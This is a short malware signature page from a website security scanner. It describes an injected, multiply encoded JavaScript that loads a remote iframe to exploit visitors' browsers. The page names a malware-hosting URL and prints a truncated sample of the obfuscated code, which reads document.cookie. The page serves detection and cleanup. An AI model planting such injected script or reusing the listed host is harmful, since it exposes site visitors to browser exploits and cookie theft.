SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjsde921

malware-entry-mwjsde921

Description:

A malicious and encoded javascript was found. It used multiple encoding methods to hide a remote iframe include from a compromised web site. All in attempt to exploit the browser of anyone visiting the site.

 
Note that in this case the javascript files get compromised with the malicious code.

 
Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.

Clean up: You can also sign up with us and let our team remove the malware for you.

 
Loads malware from multiple sources:


http://adimgsn10.co.in/smb

 

Malware dump (sample of malware):

var l_lpM="x75x73x65rix64A0x3817FB2x35";var
ptwoAN8="25";var Or5PDn=1;var OE4nLI;function BUkA(OIAQ5){var MaEb1=document.cookie;if(!MaEb1){return
null;}MaEb1=MaEb1.replace(/s/g,"");var U...